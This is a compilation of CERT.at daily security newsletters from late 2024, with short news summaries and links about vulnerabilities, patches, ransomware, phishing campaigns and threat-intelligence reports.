https://blog.sucuri.net/2024/11/malware-steals-account-credentials.html
∗∗∗ Known Attacks On Elliptic Curve Cryptography ∗∗∗
---------------------------------------------
In recent years the Elliptic Curve Cryptography approach has become popular due to its high efficiency and strong security. The purpose of this article is to present this topic in a relatively clearer way than it exists today on the internet.
---------------------------------------------
https://github.com/elikaski/ECC_Attacks
∗∗∗ Pishi: Coverage guided macOS KEXT fuzzing ∗∗∗
---------------------------------------------
In this blog post I will try to explain everything as clearly as possible so that even those who are not familiar with fuzzing can enjoy and understand it. I'll break down the concepts and provide relatable examples and resources. My goal is to make fuzzing approachable and interesting.
---------------------------------------------
https://r00tkitsmm.github.io/fuzzing/2024/11/08/Pishi.html
=====================
= Vulnerabilities =
=====================
∗∗∗ Veeam Backup Enterprise Manager: Unauthorized access by attackers possible ∗∗∗
---------------------------------------------
If attackers successfully exploit the vulnerability (CVE-2024-40715, "high"), they can bypass authentication and eavesdrop on connections as a man-in-the-middle. How this could work in detail is not yet known. [..] A security patch is available for download.
---------------------------------------------
https://www.heise.de/-10018234.html
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (podman), Debian (guix, libarchive, and nss), Fedora (expat, iaito, opendmarc, python-werkzeug, radare2, squid, and xorg-x11-server), Mageia (htmldoc, libheif, nspr, nss, firefox & rust, python-urllib3, python-werkzeug, quictls, ruby-webrick, and thunderbird), Oracle (firefox and NetworkManager-libreswan), SUSE (apache2, chromedriver, chromium, coredns, expat, govulncheck-vulndb, httpcomponents-client, java-17-openjdk, java-21-openjdk, libheif, python-wxPython, python311, python312, qbittorrent, ruby3.3-rubygem-actionmailer, ruby3.3-rubygem-actiontext, ruby3.3-rubygem-puma, ruby3.3-rubygem-rails, and virtualbox), and Ubuntu (openjdk-17, openjdk-21, openjdk-8, openjdk-lts, and qemu).
---------------------------------------------
https://lwn.net/Articles/997774/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 07-11-2024 18:00 − Friday 08-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Google To Make MFA Mandatory for Google Cloud in 2025 ∗∗∗
---------------------------------------------
Google has recently announced that it plans to implement mandatory multi-factor authentication (MFA) on all Cloud accounts by the end of 2025. [..] The implementation will affect both admins and users with access to Google Cloud. General consumer Google accounts will not be affected.
---------------------------------------------
https://heimdalsecurity.com/blog/google-cloud-mfa/
∗∗∗ 2024 Credit Card Theft Season Arrives ∗∗∗
---------------------------------------------
In today’s post we’re going to perform a malware analysis of the most common MageCart injections identified so that eCommerce website owners can better understand the risks, and (hopefully) protect themselves, their websites, and their customers from attackers.
---------------------------------------------
https://blog.sucuri.net/2024/11/2024-credit-card-theft-season-arrives.html
∗∗∗ ESET APT Activity Report Q2 2024–Q3 2024 ∗∗∗
---------------------------------------------
An overview of the activities of selected APT groups investigated and analyzed by ESET Research in Q2 2024 and Q3 2024
---------------------------------------------
https://www.welivesecurity.com/en/eset-research/eset-apt-activity-report-q2…
∗∗∗ Helldown Ransomware Group – A New Emerging Ransomware Threat ∗∗∗
---------------------------------------------
As of November 2024, the online resources available related to the Helldown ransomware group's Tactics, Techniques and Procedures (TTPs) were effectively non-existent – this blogpost aims to address that and will be updated continuously as more investigations are completed.
---------------------------------------------
https://www.truesec.com/hub/blog/helldown-ransomware-group
∗∗∗ TLPT & ME: Everything you need to know about Threat-Led Penetration Testing (TLPT) in a TIBER world. ∗∗∗
---------------------------------------------
While the TLPT RTS does come with some additional requirements or nuances compared to the TIBER framework, we can all be certain that adopting TIBER is indeed the way to fulfill DORA’s TLPT requirements. As mentioned in our initial post, we expect many more European countries to publish a TIBER implementation guide and/or a TIBER-EU 2.0 to be published for additional convergence.
---------------------------------------------
https://blog.nviso.eu/2024/11/08/tlpt-me-everything-you-need-to-know-about-…
∗∗∗ Breaking Down Earth Estries Persistent TTPs in Prolonged Cyber Operations ∗∗∗
---------------------------------------------
Discover how Earth Estries employs a diverse set of tactics, techniques, and tools, including malware such as Zingdoor and Snappybee, for its campaigns.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/k/breaking-down-earth-estries-…
∗∗∗ Defending Your Directory: An Expert Guide to Securing Active Directory Against DCSync Attacks ∗∗∗
---------------------------------------------
Last time we took a deep dive into Kerberoasting. Up next, let's unravel the sinister secrets of DCSync attacks - a stealthy technique that can bring your entire Active Directory to its knees.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper…
∗∗∗ Nameless and shameless: Ransomware Encryption via BitLocker ∗∗∗
---------------------------------------------
This post will delve into a recent incident response engagement handled by NCC Group’s Digital Forensics and Incident Response (DFIR) team, involving an unknown ransomware strain but known TTPs.
---------------------------------------------
https://www.nccgroup.com/us/research-blog/nameless-and-shameless-ransomware…
∗∗∗ Unmasking Phishing: Strategies for identifying 0ktapus domains and beyond ∗∗∗
---------------------------------------------
Wiz Research looks at phishing tactics, along with how to trace and investigate these campaigns.
---------------------------------------------
https://www.wiz.io/blog/unmasking-phishing-strategies-for-identifying-0ktap…
=====================
= Vulnerabilities =
=====================
∗∗∗ Max-Critical Cisco Bug Enables Command-Injection Attacks ∗∗∗
---------------------------------------------
Though Cisco reports no known malicious exploitation attempts, thanks to a CVSS 10 out of 10 security vulnerability (CVE-2024-20418) three of its wireless access points are vulnerable to remote, unauthenticated cyberattacks.
---------------------------------------------
https://www.darkreading.com/vulnerabilities-threats/cisco-bug-command-injec…
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (edk2), Debian (webkit2gtk), Fedora (thunderbird), Oracle (bzip2, container-tools:ol8, edk2, go-toolset:ol8, libtiff, python-idna, python3.11, and python3.12), Slackware (expat), and SUSE (apache2, govulncheck-vulndb, grub2, java-1_8_0-openjdk, python3, python39, qemu, xorg-x11-server, and xwayland).
---------------------------------------------
https://lwn.net/Articles/997480/
∗∗∗ Delta Electronics DIAScreen ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-312-02
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 06-11-2024 18:00 − Thursday 07-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Hackers increasingly use Winos4.0 post-exploitation kit in attacks ∗∗∗
---------------------------------------------
Hackers are increasingly targeting Windows users with the malicious Winos4.0 framework, distributed via seemingly benign game-related apps.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/hackers-increasingly-use-win…
∗∗∗ A look at the latest post-quantum signature standardization candidates ∗∗∗
---------------------------------------------
NIST has standardized four post-quantum signature schemes so far, and they’re not done yet: there are fourteen new candidates in the running for standardization. In this blog post we take ..
---------------------------------------------
https://blog.cloudflare.com/another-look-at-pq-signatures
∗∗∗ The Power of Process in Creating a Successful Security Posture ∗∗∗
---------------------------------------------
Establishing realistic, practitioner-driven processes prevents employee burnout, standardizes experiences, and closes many of the gaps exposed by repeated one-offs.
---------------------------------------------
https://www.darkreading.com/cybersecurity-operations/process-in-creating-su…
∗∗∗ Microsoft Windows Server 2025 Upgrade Triggers Licensing Conflicts and Operational Fallout ∗∗∗
---------------------------------------------
A recent Microsoft update has unexpectedly forced several organizations to upgrade from Windows Server 2022 to Windows Server 2025, resulting in unexpected licensing demands and operational setbacks. First reported on November 5, 2024, this incident has affected organizations ..
---------------------------------------------
https://heimdalsecurity.com/blog/microsoft-windows-server-2025-upgrade/
∗∗∗ Steam Account Checker Poisoned with Infostealer ∗∗∗
---------------------------------------------
I found an interesting script targeting Steam users. Steam[1] is a popular digital distribution platform for purchasing, downloading, and playing video games on personal computers. The script is called "steam-account-checker" ..
---------------------------------------------
https://isc.sans.edu/forums/diary/Steam+Account+Checker+Poisoned+with+Infos…
∗∗∗ China-Aligned MirrorFace Hackers Target EU Diplomats with World Expo 2025 Bait ∗∗∗
---------------------------------------------
The China-aligned threat actor known as MirrorFace has been observed targeting a diplomatic organization in the European Union, marking the first time the hacking crew has targeted an organization in the region. "During this attack, the threat ..
---------------------------------------------
https://thehackernews.com/2024/11/china-aligned-mirrorface-hackers-target.h…
∗∗∗ North Korean Hackers Target Crypto Firms with Hidden Risk Malware on macOS ∗∗∗
---------------------------------------------
A threat actor with ties to the Democratic People's Republic of Korea (DPRK) has been observed targeting cryptocurrency-related businesses with a multi-stage malware capable of infecting Apple macOS devices. Cybersecurity company SentinelOne, ..
---------------------------------------------
https://thehackernews.com/2024/11/north-korean-hackers-target-crypto.html
∗∗∗ Office paralyzed under Windows 11 24H2 with Crowdstrike installed ∗∗∗
---------------------------------------------
Anyone using Crowdstrike security software who updated to Windows 11 24H2 may have had to contend with apps that no longer worked.
---------------------------------------------
https://www.heise.de/news/Crowdstrike-legte-Office-unter-Windows-11-24H2-la…
∗∗∗ Large eBay malvertising campaign leads to scams ∗∗∗
---------------------------------------------
Consumers are being swamped by Google ads claiming to be eBay's customer service.
---------------------------------------------
https://www.malwarebytes.com/blog/scams/2024/11/large-ebay-malvertising-cam…
∗∗∗ Beware of fake Willhaben emails ∗∗∗
---------------------------------------------
Criminals are posing as Willhaben and sending out fake emails en masse. The emails, some of which look genuine, claim that you need to confirm your identity or that you will receive a refund. Another fake email supposedly contains an invoice as an attachment. We advise caution!
---------------------------------------------
https://www.watchlist-internet.at/news/willhaben-phishing/
∗∗∗ Silent Skimmer Gets Loud (Again) ∗∗∗
---------------------------------------------
We discuss a new campaign from the cybercrime group behind Silent Skimmer, showcasing the exploit of ...
---------------------------------------------
https://unit42.paloaltonetworks.com/silent-skimmer-latest-campaign/
∗∗∗ Unwrapping the emerging Interlock ransomware attack ∗∗∗
---------------------------------------------
Cisco Talos Incident Response (Talos IR) recently observed an attacker conducting big-game ..
---------------------------------------------
https://blog.talosintelligence.com/emerging-interlock-ransomware/
∗∗∗ Androxgh0st Botnet Integrates Mozi, Expands Attacks on IoT Vulnerabilities ∗∗∗
---------------------------------------------
CloudSEK reports that the Androxgh0st botnet has integrated with the Mozi botnet and ..
---------------------------------------------
https://hackread.com/androxgh0st-botnet-integrate-mozi-iot-vulnerabilities/
∗∗∗ Malicious Python Package Typosquats Popular fabric SSH Library, Exfiltrates AWS Credentials ∗∗∗
---------------------------------------------
The Socket Research Team has discovered a malicious Python package, fabrice, that is typosquatting the popular fabric SSH automation library. The threat of malware delivered through typosquatted libraries remains a significant ..
---------------------------------------------
https://socket.dev/blog/malicious-python-package-typosquats-fabric-ssh-libr…
=====================
= Vulnerabilities =
=====================
∗∗∗ Numerous vulnerabilities in HASOMED Elefant and Elefant Software Updater ∗∗∗
---------------------------------------------
https://sec-consult.com/de/vulnerability-lab/advisory/zahlreiche-schwachste…
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 05-11-2024 18:00 − Wednesday 06-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Germany drafts law to protect researchers who find security flaws ∗∗∗
---------------------------------------------
The Federal Ministry of Justice in Germany has drafted a law to provide legal protection to security researchers who discover and responsibly report security vulnerabilities to vendors.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/germany-drafts-law-to-protec…
∗∗∗ Attackers Breach IT-Based Networks Before Jumping to ICS/OT Systems ∗∗∗
---------------------------------------------
SANS recently published its 2024 State of ICS/OT Cybersecurity report, highlighting the skills of cyber professionals working in critical infrastructure, budget estimates, and emerging technologies. The report ..
---------------------------------------------
https://www.darkreading.com/ics-ot-security/attackers-breach-network-provid…
∗∗∗ Consumer advocates warn: Smart fryers eavesdrop and send data to China ∗∗∗
---------------------------------------------
Consumer advocates have uncovered data protection problems in various smart devices. Right at the front: air fryers!
---------------------------------------------
https://www.golem.de/news/verbraucherschuetzer-warnen-smarte-fritteusen-lau…
∗∗∗ New SteelFox Trojan mimics software activators, stealing sensitive data and mining cryptocurrency ∗∗∗
---------------------------------------------
Kaspersky experts have discovered a new SteelFox Trojan that mimics popular software like Foxit PDF Editor and JetBrains to spread a stealer-and-miner bundle.
---------------------------------------------
https://securelist.com/steelfox-trojan-drops-stealer-and-miner/114414/
∗∗∗ INTERPOL Disrupts Over 22,000 Malicious Servers in Global Crackdown on Cybercrime ∗∗∗
---------------------------------------------
INTERPOL on Tuesday said it took down more than 22,000 malicious servers linked to various cyber threats as part of a global operation. Dubbed Operation Synergia II, the coordinated effort ran from April 1 to ..
---------------------------------------------
https://thehackernews.com/2024/11/interpols-operation-synergia-ii.html
∗∗∗ Attackers use emulated Linux environment as backdoor ∗∗∗
---------------------------------------------
IT security researchers have discovered an unusual type of attack: the perpetrators set up an emulated Linux environment as a backdoor.
---------------------------------------------
https://www.heise.de/news/CRON-TRAP-Emulierte-Linux-Umgebung-als-Backdoor-n…
∗∗∗ Canadian Man Arrested in Snowflake Data Extortions ∗∗∗
---------------------------------------------
A 26-year-old man in Ontario, Canada has been arrested for allegedly stealing data from and extorting more than 160 companies that used the cloud data service Snowflake. On October 30, Canadian authorities arrested Alexander Moucka, a.k.a. Connor Riley Moucka of Kitchener, Ontario, on a provisional arrest warrant from the United States. Bloomberg first ..
---------------------------------------------
https://krebsonsecurity.com/2024/11/canadian-man-arrested-in-snowflake-data…
∗∗∗ You lost your iPhone, but it’s locked. That’s fine, right? ∗∗∗
---------------------------------------------
TL;DR: Default iOS configuration leaves your locked device vulnerable. Ensure your emergency contacts are set. Use 'FindMy' to track / wipe lost devices. Take regular backups. Consider turning off the ..
---------------------------------------------
https://www.pentestpartners.com/security-blog/you-lost-your-iphone-but-its-…
∗∗∗ Treacherous payment instruction: Does this email really come from your boss? ∗∗∗
---------------------------------------------
From the accounting department of an international corporation to the administration of the small business next door: recently, more and more employees have been receiving fraudulent emails in the name of company management ..
---------------------------------------------
https://www.watchlist-internet.at/news/tueckische-zahlungsanweisung-chef/
∗∗∗ Guidance for brands to help advertising partners counter malvertising ∗∗∗
---------------------------------------------
Advice to make it harder for cyber criminals to deliver malicious advertising, and reduce the risk of cyber-facilitated fraud.
---------------------------------------------
https://www.ncsc.gov.uk/guidance/guidance-brands-advertising-partners-count…
∗∗∗ With 2FA Enabled: NPM Package lottie-player Taken Over by Attackers ∗∗∗
---------------------------------------------
The popular NPM package @lottiefiles/lottie-player enables developers to seamlessly integrate Lottie animations into websites and applications. On October 30, the community reported the existence of malicious code within versions 2.0.5, 2.0.6, and 2.0.7 of the npm package. The package maintainers replied and confirmed the attackers were able to ..
---------------------------------------------
https://checkmarx.com/uncategorized/with-2fa-enabled-npm-package-lottie-pla…
∗∗∗ CopyRh(ight)adamantys Campaign: Rhadamantys Exploits Intellectual Property Infringement Baits ∗∗∗
---------------------------------------------
While we finalized this blog post, a technical analysis of this activity was published by fellow researchers from Cisco Talos. While it overlaps with our findings to some extent, our report provides additional extended information about the activity. Introduction Since July 2024, Check Point Research (CPR) has been tracking an extensive a..
---------------------------------------------
https://research.checkpoint.com/2024/massive-phishing-campaign-deploys-late…
∗∗∗ (In)tuned to Takeovers: Abusing Intune Permissions for Lateral Movement and Privilege Escalation in Entra ID Native Environments ∗∗∗
---------------------------------------------
The Mandiant Red Team recently supported a client to visualize the possible impact of a compromise by an advanced threat actor. During the assessment, Mandiant moved laterally from the customer’s on-premises environment to their Microsoft Entra ID ..
---------------------------------------------
https://cloud.google.com/blog/topics/threat-intelligence/abusing-intune-per…
∗∗∗ Threat Campaign Spreads Winos4.0 Through Game Application ∗∗∗
---------------------------------------------
FortiGuard Labs reveals a threat actor spreads Winos4.0, infiltrating gaming apps and targeting the education sector
---------------------------------------------
https://www.fortinet.com/blog/threat-research/threat-campaign-spreads-winos…
∗∗∗ Defending Your Directory: An Expert Guide to Combating Kerberoasting in Active Directory ∗∗∗
---------------------------------------------
16 hours or less, that’s all it takes for attackers to gain access to Microsoft Active Directory (AD) and unleash mayhem on your organization. If that attack happens on a Friday afternoon, they have all weekend to wreak havoc, escalating their privileges, deploying ransomware, exploiting your VPN, or exfiltrating your data. ..
---------------------------------------------
https://www.nccgroup.com/us/research-blog/defending-your-directory-an-exper…
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco Nexus Dashboard Fabric Controller SQL Injection Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in a REST API endpoint and web-based management interface of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, remote attacker with read-only privileges to execute arbitrary SQL commands on an affected device. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit ..
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Cisco Unified Contact Center Management Portal Stored Cross-Site Scripting Vulnerability ∗∗∗
---------------------------------------------
A vulnerability in the web-based management interface of Cisco Unified Contact Center Management Portal (Unified CCMP) could allow an authenticated, remote attacker with low privileges to conduct a stored ..
---------------------------------------------
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdviso…
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (libtiff), Debian (context, libheif, and thunderbird), Fedora (php-tcpdf, syncthing, and thunderbird), Gentoo (EditorConfig core C library, Flatpak, Neat VNC, and Ubiquiti UniFi), Oracle (bcc, bpftrace, grafana-pcp, haproxy, kernel, krb5, libtiff, python-gevent, python3.11-urllib3, python3.12-urllib3, and xmlrpc-c), ..
---------------------------------------------
https://lwn.net/Articles/997182/
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Monday 04-11-2024 18:00 − Tuesday 05-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Windows Server 2025 released—here are the new features ∗∗∗
---------------------------------------------
Microsoft has announced that Windows Server 2025, the latest version of its server operating system, is generally available starting Friday, November 1st.
---------------------------------------------
https://www.bleepingcomputer.com/news/microsoft/windows-server-2025-release…
∗∗∗ Nokia investigates breach after hacker claims to steal source code ∗∗∗
---------------------------------------------
Nokia is investigating whether a third-party vendor was breached after a hacker claimed to be selling the company's stolen source code.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/nokia-investigates-breach-af…
∗∗∗ Google fixes two Android zero-days used in targeted attacks ∗∗∗
---------------------------------------------
Google fixed two actively exploited Android zero-day flaws as part of its November security updates, addressing a total of 51 vulnerabilities.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/google-fixes-two-android-zer…
∗∗∗ Attack on Schneider Electric: Hungry hackers demand baguettes as ransom ∗∗∗
---------------------------------------------
The attackers claim to have captured over 40 GB of data from Schneider Electric. Their demand: 125,000 US dollars in the form of baguettes.
---------------------------------------------
https://www.golem.de/news/angriff-auf-schneider-electric-hungrige-hacker-fo…
∗∗∗ Olympia point-of-sale systems: cash registers without security updates for three years ∗∗∗
---------------------------------------------
Olympia-brand cash registers run on Android 11 and pose risks to payment transactions.
---------------------------------------------
https://www.golem.de/news/olympia-kassensysteme-registrierkassen-seit-drei-…
∗∗∗ Python RAT with a Nice Screensharing Feature ∗∗∗
---------------------------------------------
While hunting, I found another interesting Python RAT in the wild. This is not brand new because the script was released two years ago. The script I found is based on the same tool and still ..
---------------------------------------------
https://isc.sans.edu/diary/Python+RAT+with+a+Nice+Screensharing+Feature/314…
∗∗∗ Maritime lawyers assemble! ∗∗∗
---------------------------------------------
Maritime cyber insurance has been playing catch-up with maritime cyber security for a while now. It was all pretty good until the availability of cheap VSAT meant that ships ..
---------------------------------------------
https://www.pentestpartners.com/security-blog/maritime-lawyers-assemble/
∗∗∗ In final check-in before Election Day, CISA cites low-level threats, and not much else ∗∗∗
---------------------------------------------
Incidents to date have included “low level” distributed denial-of-service activity, criminal destruction of ballot drop boxes and continued threats targeting election officials, CISA Director Jen Easterly ..
---------------------------------------------
https://therecord.media/cisa-2024-presidential-election-threats
∗∗∗ Making smart cities resilient against cyberattacks ∗∗∗
---------------------------------------------
Whether we like it or not, cities worldwide are transforming into so-called "smart cities". The proponents promise innovation, sustainability and digital growth. But this infrastructure, or rather the ..
---------------------------------------------
https://www.borncity.com/blog/2024/11/05/smart-cities-gegen-cyberattacken-r…
∗∗∗ SOC Around the Clock: World Tour Survey Findings ∗∗∗
---------------------------------------------
Trend surveyed 750 cybersecurity professionals in 49 countries to learn more about the state of ..
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/k/world-tour-survey-results.ht…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (firefox, openexr, and thunderbird), Fedora (llama-cpp and python-quart), Oracle (firefox, openexr, thunderbird, and xorg-x11-server and xorg-x11-server-Xwayland), SUSE (chromium, govulncheck-vulndb, openssl-1_1, python311, and python312), and Ubuntu (linux-azure, linux-bluefield, linux-azure, linux-gcp, linux-ibm, openjpeg2, and ruby3.0, ruby3.2, ruby3.3).
---------------------------------------------
https://lwn.net/Articles/997030/
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 31-10-2024 18:00 − Monday 04-11-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Thousands of hacked TP-Link routers used in years-long account takeover attacks ∗∗∗
---------------------------------------------
The botnet is being skillfully used to launch "highly evasive" password-spraying attacks.
---------------------------------------------
https://arstechnica.com/information-technology/2024/11/microsoft-warns-of-8…
∗∗∗ DDoS site Dstat.cc seized and two suspects arrested in Germany ∗∗∗
---------------------------------------------
The Dstat.cc DDoS review platform has been seized by law enforcement, and two suspects have been arrested after the service helped fuel distributed denial-of-service attacks for years.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/ddos-site-dstatcc-seized-and…
∗∗∗ Cisco says DevHub site leak won’t enable future breaches ∗∗∗
---------------------------------------------
Cisco says that non-public files recently downloaded by a threat actor from a misconfigured public-facing DevHub portal don't contain information that could be exploited in future breaches of the company's systems.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cisco-says-devhub-site-leak-…
∗∗∗ Goods not delivered: fraudsters hack thousands of web shops and rake in millions ∗∗∗
---------------------------------------------
Since 2019, hackers have infiltrated countless online shops as part of a fraud campaign. Buyers of certain products received ..
---------------------------------------------
https://www.golem.de/news/ware-nicht-geliefert-betrueger-hacken-tausende-we…
∗∗∗ From Naptime to Big Sleep: Using Large Language Models To Catch Vulnerabilities In Real-World Code ∗∗∗
---------------------------------------------
In our previous post, Project Naptime: Evaluating Offensive Security Capabilities of Large Language Models, we introduced our framework for large-language-model-assisted vulnerability research and demonstrated its potential by improving the state-of-the-art performance on Meta's CyberSecEval2 benchmarks. Since then, Naptime has evolved into Big Sleep, a collaboration between Google Project Zero and Google DeepMind.
---------------------------------------------
https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.ht…
∗∗∗ Inside Iran’s Cyber Playbook: AI, Fake Hosting, and Psychological Warfare ∗∗∗
---------------------------------------------
U.S. and Israeli cybersecurity agencies have published a new advisory attributing an Iranian cyber group to targeting the 2024 Summer Olympics and compromising a French commercial dynamic display provider to show messages denouncing Israel's participation ..
---------------------------------------------
https://thehackernews.com/2024/11/inside-irans-cyber-playbook-ai-fake.html
∗∗∗ Financial institutions told to get their house in order before the next CrowdStrike strikes ∗∗∗
---------------------------------------------
Calls for improvements will soon turn into demands when new rules come into force. The UK's finance regulator is urging all institutions under its remit to better prepare for IT meltdowns like ..
---------------------------------------------
https://www.theregister.com/2024/11/02/fca_it_resilience/
∗∗∗ Booking.com Phishers May Leave You With Reservations ∗∗∗
---------------------------------------------
A number of cybercriminal innovations are making it easier for scammers to cash in on your upcoming travel plans. This story examines a recent spear-phishing campaign that ensued when a California hotel had its booking.com credentials stolen. We'll ..
---------------------------------------------
https://krebsonsecurity.com/2024/11/booking-com-phishers-may-leave-you-with…
∗∗∗ Free webinars on staying safe online ∗∗∗
---------------------------------------------
Starting December 2, exciting webinars on the safe and responsible use of mobile phones and the internet will take place in cooperation with AK Oberösterreich and Saferinternet.at. Expand your digital skills and ..
---------------------------------------------
https://www.watchlist-internet.at/news/kostenlose-webinare-zum-schutz-im-in…
∗∗∗ TA Phone Home: EDR Evasion Testing Reveals Extortion Actors Toolkit ∗∗∗
---------------------------------------------
A threat actor attempted to use an AV/EDR bypass tool in an extortion attempt. Instead, the tool provided Unit 42 insight into the threat actor.
---------------------------------------------
https://unit42.paloaltonetworks.com/edr-bypass-extortion-attempt-thwarted/
∗∗∗ FBI wants more info on hackers behind Sophos exploitation after report on China’s intrusions ∗∗∗
---------------------------------------------
The FBI is asking the public for help in tracking down the people behind a series of intrusions into edge devices and networks.
---------------------------------------------
https://therecord.media/fbi-hackers-china-wants-info
∗∗∗ Kimsuky Group’s Malware Disguised as Lecture Request Form (MSC, HWP) ∗∗∗
---------------------------------------------
Recently, malware disguised as a lecture request form targeting specific users was identified. The distributed files include Hangul Word Processor (HWP) documents and files in MSC format, which download additional malicious files. Decoy document files used to disguise as legitimate documents have been found to sometimes contain ..
---------------------------------------------
https://asec.ahnlab.com/en/84181/
∗∗∗ Supply Chain Attack Using Ethereum Smart Contracts to Distribute Multi-Platform Malware ∗∗∗
---------------------------------------------
[..] package “jest-fet-mock,” which implements a different approach using Ethereum smart contracts for command-and-control operations. The package masquerades as a popular testing utility while distributing malware across Windows, Linux, and macOS platforms. This discovery represents a notable difference in supply chain attack methodologies, combining ..
---------------------------------------------
https://checkmarx.com/blog/supply-chain-attack-using-ethereum-smart-contrac…
∗∗∗ Hackers Claim Access to Nokia Internal Data, Selling for $20,000 ∗∗∗
---------------------------------------------
Hackers claim to have breached Nokia through a third-party contractor, allegedly stealing SSH keys, source code, and internal
---------------------------------------------
https://hackread.com/hackers-claim-access-nokia-internal-data-selling-20k/
∗∗∗ Mallox Ransomware ∗∗∗
---------------------------------------------
FortiGuard Labs continues to see an increase in Mallox ransomware-related activity, detecting Mallox ransomware on several hundred FortiGuard sensors. Ransomware infection may cause disruption, damage to daily operations, ..
---------------------------------------------
https://fortiguard.fortinet.com/outbreak-alert/mallox-ransomware
∗∗∗ Missing Link: How a company lost control during a cyberattack ∗∗∗
---------------------------------------------
The head of IT actually feels quite safe. Until hackers march into the company in broad daylight, and walk out again unchallenged. The haul: full control.
---------------------------------------------
https://heise.de/-9984869
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (firefox, grafana, kernel, and mod_http2), Debian (chromium, openssl, and thunderbird), Fedora (chromium, krb5, mysql8.0, polkit, python-single-version, and webkitgtk), Mageia (bind, buildah, podman, skopeo, kernel, kmod-xtables-addons, kmod-virtualbox, kernel-firmware & kernel-firmware-nonfree radeon-firmware, ..
---------------------------------------------
https://lwn.net/Articles/996908/
∗∗∗ WordPress Vulnerability & Patch Roundup October 2024 ∗∗∗
---------------------------------------------
https://blog.sucuri.net/2024/11/wordpress-vulnerability-patch-roundup-octob…
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 30-10-2024 18:00 − Thursday 31-10-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ With 2FA Enabled: NPM Package lottie-player Taken Over by Attackers ∗∗∗
---------------------------------------------
On October 30, the community reported existence of malicious code within versions 2.0.5, 2.0.6, and 2.0.7 of the npm package. The package maintainers replied and confirmed the attackers were able to take over the NPM package using a leaked automation token which was used to automate publications of NPM packages.
---------------------------------------------
https://checkmarx.com/blog/with-2fa-enabled-npm-package-lottie-player-taken…
∗∗∗ GreyNoise Intelligence Discovers Zero-Day Vulnerabilities in Live Streaming Cameras with the Help of AI ∗∗∗
---------------------------------------------
Affected devices are typically high-cost live streaming cameras, sometimes exceeding several thousand dollars. [..] Affected devices use VHD PTZ camera firmware < 6.3.40 used in PTZOptics, Multicam Systems SAS, and SMTAV Corporation devices based on Hisilicon Hi3516A V600 SoC V60, V61, and V63. These cameras, which feature an embedded web server allowing for direct access by web browser, are reportedly deployed in environments where reliability and privacy are crucial, including: Industrial and manufacturing plants [..] Business conferences [..] Healthcare settings [..] State and local government environments [..] Houses of worship
---------------------------------------------
https://www.greynoise.io/blog/greynoise-intelligence-discovers-zero-day-vul…
∗∗∗ Midnight Blizzard conducts large-scale spear-phishing campaign using RDP files ∗∗∗
---------------------------------------------
Microsoft is releasing this blog to notify the public and disrupt this threat actor activity. This blog provides context on these external spear-phishing attempts, which are common attack techniques and do not represent any new compromise of Microsoft.
---------------------------------------------
https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-…
∗∗∗ Discovering Hidden Vulnerabilities in Portainer with CodeQL ∗∗∗
---------------------------------------------
In this blog, we will show how we used CodeQL to find these vulnerabilities and even wrote custom queries to find a specific vulnerability.
---------------------------------------------
https://www.cyberark.com/resources/threat-research-blog/discovering-hidden-…
∗∗∗ Loose-lipped neural networks and lazy scammers ∗∗∗
---------------------------------------------
As large language models improve, their strengths and weaknesses, as well as the tasks they do well or poorly, are becoming better understood. Threat actors are exploring applications of this technology in a range of automation scenarios. But, as we see, they sometimes commit blunders that help shed light on how they use LLMs, at least in the realm of online fraud.
---------------------------------------------
https://securelist.com/llm-phish-blunders/114367/
∗∗∗ Mounting memory with MemProcFS for advanced memory forensics ∗∗∗
---------------------------------------------
Whilst this blog does not intend to go into any detail on the most popular tools available to analyse memory, nor to offer a deep dive into analysis techniques, it is intended to provide high-level information about some significant enhancements to memory forensics in the last few years and the differences in tooling. It also covers three memory forensic tools; many others are available.
---------------------------------------------
https://www.pentestpartners.com/security-blog/mounting-memory-with-memprocf…
∗∗∗ The Persistent Perimeter Threat: Strategic Insights from a Multi-Year APT Campaign Targeting Edge Devices ∗∗∗
---------------------------------------------
